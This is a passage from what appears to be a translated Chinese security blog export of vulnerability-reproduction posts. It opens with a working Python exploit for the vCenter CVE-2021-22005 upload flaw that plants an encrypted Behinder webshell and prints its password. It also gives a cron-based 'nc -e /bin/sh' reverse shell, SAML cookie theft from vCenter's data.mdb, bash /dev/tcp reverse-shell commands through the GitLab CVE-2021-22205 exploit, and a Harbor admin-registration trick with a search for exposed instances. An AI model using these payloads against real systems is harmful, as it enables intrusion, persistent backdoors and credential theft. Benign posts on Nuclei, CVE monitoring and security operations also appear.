"%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (target, agent_name, log_param) headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close" } json_data = { "manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True, "deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7", "localPayloadPath": "a8", "localObfuscationMapPath": "a9" } requests.post(url, headers=headers, json=json_data, verify=False) def generate_manifest(webshell_location, webshell): manifestData = """<manifest recommendedPageSize="500"> <request> <query name="vir:VCenter"> <constraint> 
<targetType>ServiceInstance</targetType> </constraint> <propertySpec> <propertyNames>content.about.instanceUuid</propertyNames> <propertyNames>content.about.osType</propertyNames> <propertyNames>content.about.build</propertyNames> <propertyNames>content.about.version</propertyNames> </propertySpec> </query> </request> <cdfMapping> <indepedentResultsMapping> <resultSetMappings> <entry> <key>vir:VCenter</key> <value> <value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping"> <resourceItemToJsonLdMapping> <forType>ServiceInstance</forType> <mappingCode><![CDATA[ #set($appender = $GLOBAL-logger.logger.parent.getAppender("LOGFILE"))## #set($orig_log = $appender.getFile())## #set($logger = $GLOBAL-logger.logger.parent)## $appender.setFile("%s")## $appender.activateOptions()## $logger.warn("%s")## $appender.setFile($orig_log)## $appender.activateOptions()##]]> </mappingCode> </resourceItemToJsonLdMapping> </value> </value> </entry> </resultSetMappings> </indepedentResultsMapping> </cdfMapping> <requestSchedules> <schedule interval="1h"> <queries> <query>vir:VCenter</query> </queries> </schedule> </requestSchedules> </manifest>""" % (webshell_location, webshell) return manifestData def arg(): parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", help = "Target", required = True) args = parser.parse_args() target = args.target print("[*] Target: %s" % target) return target def exec(): target = arg() # Variables webshell_param = id_generator(6) log_param = id_generator(6) agent_name = id_generator(6) shell_name = "Server.jsp" webshell = """<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new 
SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>""" webshell_location = "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % shell_name webshell = str_to_escaped_unicode(webshell) manifestData = generate_manifest(webshell_location,webshell) print("[*] Creating Agent") createAgent(target, agent_name, log_param) url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (target, agent_name, log_param) headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} json_data ={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"} requests.post(url, headers=headers, json=json_data, verify=False) #webshell连接地址 url = "%s/idm/..;/%s" % (target, shell_name) code = requests.get(url=url, headers=headers,verify=False).status_code if code != "404": print("webshell地址: %s" % url) print("[*]冰蝎3.0 Webshell连接密码: rebeyond" ) else: print("未获取到webshell地址") if __name__ == '__main__': exec()<span aria-hidden="true" 
class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></co
de></pre><h4 id="反弹shell-EXP"><a href="#反弹shell-EXP" class="headerlink" title="反弹shell EXP"></a>Reverse shell EXP</h4><p><code>curl -kv "https:/xx.xx.xx.xx/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh Your IP port"</code></p><p>This did not work for me.</p><h4 id="vCenter-cookie读取登录"><a href="#vCenter-cookie读取登录" class="headerlink" title="vCenter cookie读取登录"></a>vCenter login by reading the cookie</h4><p>Location of the data store holding the key authentication material:</p><ul><li><p>Linux:</p><pre class="line-numbers language-none"><code class="language-none">/storage/db/vmware-vmdir/data.mdb<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li><li><p>Windows</p><pre class="line-numbers language-none"><code class="language-none">C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li></ul><p><strong>Reading the cookie</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211030235010951.png" alt="Database directory on Linux"></p><p><strong>Download the decryption script:</strong><code>git clone https://github.com/horizon3ai/vcenter_saml_login.git</code></p><p><strong>Usage:</strong></p><pre class="line-numbers language-none"><code class="language-none">python3 vcenter_saml_login.py -p data.mdb -t 10.1.2.174<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><pre class="line-numbers language-none"><code class="language-none">If a missing module is reported, fix it as follows:
ModuleNotFoundError: No module named 'OpenSSL'
Fix: pip3 install pyOpenSSL
ModuleNotFoundError: No module named 'ldap'
Fix: pip3 install python-ldap
ModuleNotFoundError: No module named 'signxml'
Fix: pip3 install signxml<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211031004758724.png" alt="Decrypting the mdb"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/QQ20211031-013719-HD.gif" alt="QQ20211031-013719-HD"></p><h3 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>Remediation</h3><p>1. Upgrade VMware vCenter Server to the latest version.</p><p>2. For CVE-2021-22005, the VMware vCenter Server arbitrary file upload, apply the mitigations described in <a href="https://kb.vmware.com/s/article/85717">https://kb.vmware.com/s/article/85717</a>.</p>]]></content>
<categories>
<category> Vulnerability Reproduction </category>
</categories>
<tags>
<tag> VMware vCenter </tag>
</tags>
</entry>
<entry>
<title>CVE-2021-22205 GitLab Unauthenticated RCE</title>
<link href="/article/659abcc5.html"/>
<url>/article/659abcc5.html</url>
<content type="html"><![CDATA[<h2 id="CVE-2021-22205-GitLab-未授权RCE"><a href="#CVE-2021-22205-GitLab-未授权RCE" class="headerlink" title="CVE-2021-22205 GitLab 未授权RCE"></a>CVE-2021-22205 GitLab Unauthenticated RCE</h2><h3 id="漏洞简介:"><a href="#漏洞简介:" class="headerlink" title="漏洞简介:"></a>Overview:</h3><p>GitLab is an open-source project for repository management: a web service built on Git as the code management tool.</p><p>GitLab is a Git project management platform written in Ruby. GitLab 11.9 and later uses the image processing tool ExifTool and is therefore affected by <a href="https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html">CVE-2021-22204</a>: an attacker can upload a maliciously crafted image through an unauthenticated endpoint and then, on the GitLab server, execute</p><p>References:</p><ul><li><a href="https://hackerone.com/reports/1154542">https://hackerone.com/reports/1154542</a></li><li><a href="https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html">https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html</a></li><li><a href="https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/">https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/</a></li><li><a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml">https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml</a></li><li><a href="https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/README.zh-cn.md">https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/README.zh-cn.md</a></li></ul><h3 id="影响版本:"><a href="#影响版本:" class="headerlink" title="影响版本:"></a>Affected Versions:</h3><pre class="line-numbers language-none"><code class="language-none">This vulnerability affects the following GitLab Enterprise and Community editions:
11.9 <= GitLab(CE/EE)< 13.8.8
13.9 <= GitLab(CE/EE)< 13.9.6
13.10 <=GitLab(CE/EE)< 13.10.3
Version reproduced in this article: GitLab CE 13.10.1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre><h3 id="漏洞环境"><a href="#漏洞环境" class="headerlink" title="漏洞环境"></a>Lab Environment</h3><p>Recommended memory: more than 8 GB</p><p>Run the following commands to start a GitLab 13.10.1 server:</p><pre class="line-numbers language-none"><code class="language-none">git clone https://github.com/vulhub/vulhub.git
cd vulhub/gitlab/CVE-2021-22205/
docker-compose up -d
Once the environment is up, open http://your-ip:8080 to see the GitLab login page.<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029214111000.png" alt="GitLab home page"></p><h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>Reproduction</h3><h4 id="漏洞POC"><a href="#漏洞POC" class="headerlink" title="漏洞POC"></a>PoC</h4><p><code>https://github.com/inspiringz/CVE-2021-22205/</code></p><p><code>https://github.com/Al1ex/CVE-2021-22205</code></p><h4 id="漏洞验证"><a href="#漏洞验证" class="headerlink" title="漏洞验证"></a>Verification</h4><p><code>python CVE-2021-22205.py -v true -t http://Your IP:Port</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029214708935.png" alt="Vulnerability probe"></p><p><strong>Command execution:</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029215055570.png" alt="DNSLog verification"></p><p><strong>Reverse shell:</strong></p><pre class="line-numbers language-none"><code class="language-none">python3 CVE-2021-22205.py -a true -t http://Your IP:port -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
This command writes the reverse shell command into a shell script under /tmp
python3 CVE-2021-22205.py -a true -t http://Your IP:port -c "chmod +x /tmp/1.sh"
This command makes the written script executable
python3 CVE-2021-22205.py -a true -t http://Your IP:port -c "/bin/bash /tmp/1.sh"
This command runs the reverse shell script<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029215631594.png" alt="Writing the reverse shell into 1.sh"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029220042720.png" alt="Verifying the write succeeded"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029220215319.png" alt="Changing the script permissions"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029220251930.png" alt="Verifying the permission change"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029220538808.png" alt="Reverse shell"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029220605182.png" alt="Most shells run as the git user, so privilege escalation is needed"></p><h3 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>Remediation</h3><p>1. Upgrade GitLab promptly to the latest secure version</p><p>2. Configure access control policies so that affected GitLab instances are not exposed to the public</p>]]></content>
<categories>
<category> Vulnerability Reproduction </category>
</categories>
<tags>
<tag> GitLab </tag>
</tags>
</entry>
<entry>
<title>Scanning Tool: Nuclei</title>
<link href="/article/da8eafa9.html"/>
<url>/article/da8eafa9.html</url>
<content type="html"><![CDATA[<p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/nuclei-logo.png" alt="Nuclei"></p><p><strong>Nuclei is a very fast and easy-to-use scanner that lets researchers run configurable, template-based scans against targets, and it exposes many extension points to support that use.</strong></p><h3 id="功能介绍"><a href="#功能介绍" class="headerlink" title="功能介绍"></a>Features</h3><ul><li><p>Simple, modular code that is easy to use and extend;</p></li><li><p>Fast and fully configurable, built on a template-based engine;</p></li><li><p>Retransmission on errors and special cases;</p></li><li><p>WAF handling;</p></li><li><p>Smart matching for zero-false-positive scanning;</p></li></ul><h3 id="工具使用"><a href="#工具使用" class="headerlink" title="工具使用"></a>Usage</h3><p><code>nuclei -h</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211028095416287.png" alt="image-20211028095416287"></p><p><strong>The command above prints the tool's help; its commonly used options are listed below:</strong></p><table><thead><tr><th>Option</th><th><strong>Description</strong></th><th>Example</th></tr></thead><tbody><tr><td><strong>-c</strong></td><td><strong>Number of concurrent requests (default 10)</strong></td><td><strong>nuclei -c 100</strong></td></tr><tr><td><strong>-l</strong></td><td><strong>List of URLs to run the templates against</strong></td><td><strong>nuclei -l url.txt</strong></td></tr><tr><td><strong>-t</strong></td><td><strong>Templates to run</strong></td><td><strong>nuclei -t git-core.yaml -t cves/</strong></td></tr><tr><td><strong>-o</strong></td><td><strong>File to save the results to (optional)</strong></td><td><strong>nuclei -o output.txt</strong></td></tr><tr><td><strong>-timeout</strong></td><td><strong>Timeout (default 5 seconds)</strong></td><td><strong>nuclei -timeout 5</strong></td></tr><tr><td><strong>-proxy-url</strong></td><td><strong>HTTP proxy address</strong></td><td><strong>nuclei -proxy-url hxxp://127.0.0.1:8080</strong></td></tr><tr><td><strong>-proxy-socks-url</strong></td><td><strong>SOCKS proxy address</strong></td><td><strong>nuclei -proxy-socks-url socks5://user:pass@Your IP:1080</strong></td></tr><tr><td><strong>-random-agent</strong></td><td><strong>Use a random User-Agent</strong></td><td><strong>nuclei -random-agent</strong></td></tr><tr><td><strong>-H</strong></td><td><strong>Custom request header</strong></td><td><strong>nuclei -H "x-bug-bounty:hacker"</strong></td></tr><tr><td><strong>-update-templates</strong></td><td><strong>Download or update the templates</strong></td><td><strong>nuclei -update-templates</strong></td></tr><tr><td><strong>-stats</strong></td><td><strong>Show progress statistics</strong></td><td><strong>nuclei -stats</strong></td></tr><tr><td><strong>-debug</strong></td><td><strong>Debug requests and responses</strong></td><td><strong>nuclei -debug</strong></td></tr><tr><td><strong>-burp-collaborator-biid</strong></td><td><strong>Use the Burp Collaborator plugin</strong></td><td><strong>nuclei -burp-collaborator-biid XXXX</strong></td></tr></tbody></table><h3 id="工具安装"><a href="#工具安装" class="headerlink" title="工具安装"></a>Installation</h3><p><strong>Install from a release:</strong></p><p>On the project's GitHub <a href="https://github.com/projectdiscovery/nuclei/releases">Releases</a> page, choose the prebuilt binary for your platform, extract the archive (with <code>tar</code> or <code>unzip</code>, depending on its format), and move the extracted binary into a directory on your $PATH. The commands used here:</p><pre class="line-numbers language-none"><code class="language-none">wget https://github.com/projectdiscovery/nuclei/releases/download/v2.5.3/nuclei_2.5.3_linux_amd64.zip
unzip nuclei_2.5.3_linux_amd64.zip<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>]]></content>
<categories>
<category> Security Tools Library </category>
</categories>
<tags>
<tag> Nuclei </tag>
</tags>
</entry>
<entry>
<title>GitHub CVE and Tool Monitoring</title>
<link href="/article/92446bce.html"/>
<url>/article/92446bce.html</url>
<content type="html"><![CDATA[<h2 id="一-拉取项目"><a href="#一-拉取项目" class="headerlink" title="一 拉取项目"></a>1 Pulling the project</h2><h3 id="1-1-简介:"><a href="#1-1-简介:" class="headerlink" title="1.1 简介:"></a>1.1 Overview:</h3><p>Monitors GitHub for newly created repositories carrying CVE numbers and for updates to published tools, and pushes notifications to DingTalk or ServerChan</p><h3 id="1-2-项目地址"><a href="#1-2-项目地址" class="headerlink" title="1.2 项目地址"></a>1.2 Project URL</h3><p><code>https://github.com/yhy0/github-cve-monitor</code></p><h3 id="1-3-拉取部署"><a href="#1-3-拉取部署" class="headerlink" title="1.3 拉取部署"></a>1.3 Clone and deploy</h3><p><code>https://github.com/yhy0/github-cve-monitor.git</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027200514536.png" alt="image-20211027200514536"></p><p>Install the required libraries: <code>pip3 install -r requirements.txt</code></p><h3 id="1-4-配置推送"><a href="#1-4-配置推送" class="headerlink" title="1.4 配置推送"></a>1.4 Configure notifications</h3><p><strong>DingTalk bot:</strong> create a new group -> Group Settings -> Group Assistant (bot management) -> Add Bot -> choose "Custom: connect a custom service via webhook"</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027201714294.png" alt="image-20211027201714294"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027201924581.png" alt="image-20211027201924581"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027202023135.png" alt="image-20211027202023135"></p><p>Configure config.yaml:</p><p><strong>enable: 0 turns a channel off; enable: 1 turns it on.</strong> I enabled Feishu here; if you want to use a different channel, turn Feishu off to avoid trouble</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027202452504.png" alt="image-20211027202452504"></p><h3 id="1-5-gihtub-token-获取"><a href="#1-5-gihtub-token-获取" class="headerlink" title="1.5 gihtub token 获取"></a>1.5 Obtaining a GitHub token</h3><p>For unauthenticated requests, the GitHub rate limit allows at most 60 requests per hour</p><p>API requests that use basic authentication may make up to 5,000 requests per hour</p><p>Create a token at <a href="https://github.com/settings/tokens/new">https://github.com/settings/tokens/new</a>; choose no expiration, since the monitor has to run continuously</p><p><img src="https://github.com/yhy0/github-cve-monitor/raw/master/images/image-20210729172507519.png" alt="image-20210729172507519"></p><h3 id="1-6-运行测试"><a href="#1-6-运行测试" class="headerlink" title="1.6 运行测试"></a>1.6 Running and testing</h3><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027202829263.png" alt="image-20211027202829263"></p><p>Run in the background:</p><p><code>screen python github_cve_monitor.py</code></p><p><code>screen -ls</code> lists the running screen sessions</p><pre class="line-numbers language-none"><code class="language-none">screen -r github_cve  # reattach to the github_cve background screen session, if it exists<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><h3 id="1-7-效果展示"><a href="#1-7-效果展示" class="headerlink" title="1.7 效果展示"></a>1.7 Results</h3><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211028121337881.png" alt="image-20211028121337881"></p>]]></content>
<categories>
<category> Threat Intelligence </category>
</categories>
<tags>
<tag> Threat Intelligence </tag>
</tags>
</entry>
<entry>
<title>Understanding Security Operations</title>
<link href="/article/f8cfd5f1.html"/>
<url>/article/f8cfd5f1.html</url>
<content type="html"><![CDATA[<h2 id="0x0-安全运营的理解"><a href="#0x0-安全运营的理解" class="headerlink" title="0x0 安全运营的理解"></a>0x0 Understanding security operations</h2><h3 id="0-1-岗位理解"><a href="#0-1-岗位理解" class="headerlink" title="0.1 岗位理解"></a>0.1 Understanding the role</h3><p><strong>Security O&M versus security operations</strong></p><p><code>O&M</code>: operations and maintenance, in short, keeps information systems running normally.</p><p><code>Security O&M</code> = security + O&M</p><p><code>Operations</code>: operations must <strong>continuously deliver value</strong>.</p><p><code>Security operations</code> = <code>security</code> + <code>operations</code> = using the existing security systems and tools to produce valuable security information and applying it to resolve security risks, thereby achieving the ultimate goal of security.</p><h3 id="0-2-安全运营做什么?"><a href="#0-2-安全运营做什么?" class="headerlink" title="0.2 安全运营做什么?"></a>0.2 What does security operations do?</h3><p><strong>The five killer questions from management</strong></p><ul><li>Who is attacking us?</li><li>Which assets are under attack?</li><li>How do the attacks trend compared with last week?</li><li>What are the main attack techniques?</li><li>Where is our biggest risk?</li></ul><p>The daily work of security operations is a process of <strong>"distilling" a huge volume of alerts</strong>, discarding the noise and keeping the essence.</p><h4 id="如何萃取安全数据"><a href="#如何萃取安全数据" class="headerlink" title="如何萃取安全数据"></a>How to distill security data</h4><p><code>Event-Alert-Threat-Incident</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185509.png" alt="img"></p><h4 id="从Event到Incident处理流程"><a href="#从Event到Incident处理流程" class="headerlink" title="从Event到Incident处理流程"></a>Processing flow from Event to Incident</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185521-20211020165930413.png" alt="img"></p><ul><li><p>Alert generation</p><ul><li>Normalization and clustering</li><li>Rule signatures</li><li>Algorithmic models</li><li>Threat intelligence</li></ul></li><li><p>Threat generation</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185531-20211020170019988.png" alt="img"></p><ul><li>Merging and compression</li><li>Enrichment</li><li>False-positive filtering</li><li>Confidence (a confidence interval expresses how probable it is that the true value of a parameter lies within a range around the measured result)</li></ul></li><li><p>Threat accumulation</p></li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185548.png" alt="img"></p><ul><li>Scenario aggregation</li><li>Situational awareness and response business scenarios</li><li>Asset scoring</li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185608.png" alt="img"></p><ul><li>Threat operations</li><li>Security incidents</li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185635-20211020170301022-20211020170305743.png" alt="img"></p><h2 id="从安全事件分析角度"><a href="#从安全事件分析角度" class="headerlink" title="从安全事件分析角度"></a>From the perspective of security incident analysis</h2><p>Security data analysis and security incident analysis form a core module of security operations, a service and support capability. Security operations itself supports incident analysis, connecting threat hunting (where it exists) with the emergency response center; it is the command post of the enterprise security "army". Security operations underpins incident analysis and constitutes the overall network security assurance, which includes:</p><ul><li>Network security planning</li><li>Asset inventory</li><li>Security device management</li><li>Penetration testing</li><li>Vulnerability scanning</li><li>Threat monitoring</li><li>Security incident analysis</li><li>Incident response</li><li>Risk assessment and other processes and services</li></ul><p>These cover every area of network security, yet no service stands alone: they interrelate, overlap and interact to form a network security ecosystem.[1] Put simply, security operations is the hub of enterprise security: it handles many matters but does not execute every one of them directly. For example, the incident response, vulnerability scanning and penetration testing mentioned above may belong to an Incident Response team, while risk assessment and treatment may belong to a Risk Management team. </p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185726-20211020170347185.png" alt="img"> </p><p>Reference: <a href="https://wiki.y1ng.org/0x0_%E7%90%86%E8%A7%A3/0x3_%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5%E7%9A%84%E8%A6%81%E7%B4%A0/">https://wiki.y1ng.org/0x0_%E7%90%86%E8%A7%A3/0x3_%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5%E7%9A%84%E8%A6%81%E7%B4%A0/</a></p>]]></content>
<categories>
<category> Security Operations </category>
</categories>
<tags>
<tag> Security Operations </tag>
</tags>
</entry>
<entry>
<title>Kiosk Escape</title>
<link href="/article/6cd3cbcb.html"/>
<url>/article/6cd3cbcb.html</url>
<content type="html"><![CDATA[<h3 id="1-自助终端"><a href="#1-自助终端" class="headerlink" title="1/自助终端"></a>1/ Self-service terminals</h3><p> With economic development, vending machines have appeared on every street; self-service ticket purchase and collection is now common at airports, stations and other transport hubs; hospitals, banks and government service halls are full of self-service terminals, which have made daily life far more convenient and raised efficiency. The security of these terminals, however, has so far received little attention.</p><h4 id="1-1-基本介绍"><a href="#1-1-基本介绍" class="headerlink" title="1.1 基本介绍"></a>1.1 Introduction</h4><p>A self-service terminal is an electronic device that combines a touch screen with system software and a set of functions and services. The user operates it following on-screen prompts, and the device completes the service flow with the help of the network, the user's phone or its own sensor components.</p><p><img src="http://www.4001108775.net/uploads/allimg/200508/1-20050P93602449.jpg"></p><p>These devices are widely used in telecommunications, finance, government, transport, healthcare, commerce, taxation and other sectors. By function they fall roughly into:</p><ul><li>Top-up terminals</li><li>Bill-payment terminals</li><li>Vending terminals</li><li>Card-issuing terminals</li><li>Ticket sale and collection terminals</li><li>Printing terminals</li><li>Inquiry terminals</li></ul><h4 id="1-2-操作系统"><a href="#1-2-操作系统" class="headerlink" title="1.2 操作系统"></a>1.2 Operating systems</h4><p>Today the operating systems commonly found on self-service terminals are Windows and Android, with a small number running Linux.</p><p>The operating system is chosen according to the service offered: most vending machines run Android with the service application installed as an APK, and the Android navigation bar and notification menu are disabled and hidden to keep the user from leaving the app.</p><p><strong>Ticket terminals and government service systems mostly run Windows; the service application usually runs maximized and always on top, with the desktop and taskbar hidden, so that the user can only operate within the current application.</strong></p><h4 id="1-3-网络通信"><a href="#1-3-网络通信" class="headerlink" title="1.3 网络通信"></a>1.3 Network communication</h4><p>Self-service terminals connect to the network in one of three ways:</p><ul><li>3G/4G mobile network (enterprise private IoT SIM)</li><li>Wi-Fi (usually the office network)</li><li>Wired Ethernet (connected to the intranet)</li></ul><p>Terminals in specific venues with planned cabling, such as ticket machines at airports and stations or self-service devices in government offices, hospitals and banks, are generally connected by network cable, although wireless access cannot be ruled out. They normally sit on internal network addresses.</p><h4 id="1-4-逃逸思路"><a href="#1-4-逃逸思路" class="headerlink" title="1.4 逃逸思路"></a>1.4 Escape approach</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012155502344.png" alt="image-20211012155502344"></p><h4 id="社死案例"><a href="#社死案例" class="headerlink" title="社死案例"></a>Embarrassing cases</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029222911913.png" alt="image-20211029222911913"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012155745256.png" alt="image-20211012155745256"></p>]]></content>
<categories>
<category> Kiosk Escape </category>
</categories>
<tags>
<tag> Kiosk Escape </tag>
</tags>
</entry>
<entry>
<title>Harbor Arbitrary Admin Registration Vulnerability</title>
<link href="/article/bf4f999f.html"/>
<url>/article/bf4f999f.html</url>
<content type="html"><![CDATA[<p><strong>1. Introduction</strong></p><p> Harbor is an enterprise-class registry server for storing and distributing Docker images. It extends the open-source Docker Distribution with features enterprises need, such as security, identity and management.</p><p> As an enterprise private registry, Harbor offers better performance and security and makes it more efficient to transfer images between build and runtime environments. It supports replication of images across multiple registry nodes, with all images kept in the private registry so that data and intellectual property stay under control inside the corporate network. Harbor also provides advanced security features such as user management, access control and activity auditing.</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012133854849.png"></p><p><strong>2. Affected versions</strong></p><p><code>Harbor: 1.7.0-1.8.2</code></p><p><strong>3. Reproduction</strong></p><p>Search syntax </p><p><code>title="Harbor" && country=CN</code></p><p><strong>Register, then capture the request</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012133912238.png"></p><p><strong>Modify the request by appending <code>"has_admin_role":true</code> to the end of the JSON body</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012134504203.png"></p><p><strong>Send the request; a 201 status means success</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012134353211.png"></p><p><strong>Log in to verify</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012134625223.png"></p><h2 id="4-修复方案"><a href="#4-修复方案" class="headerlink" title="4.修复方案"></a>4. Remediation</h2><p>Upgrade Harbor to version 1.7.6 or 1.8.3</p>]]></content>
<categories>
<category> Vulnerability Reproduction </category>
</categories>
<tags>
<tag> Harbor </tag>
</tags>
</entry>
<entry>
<title>3. Cobaltstrike Beacon, Menu Bar and Views</title>
<link href="/article/42e57ad0.html"/>
<url>/article/42e57ad0.html</url>
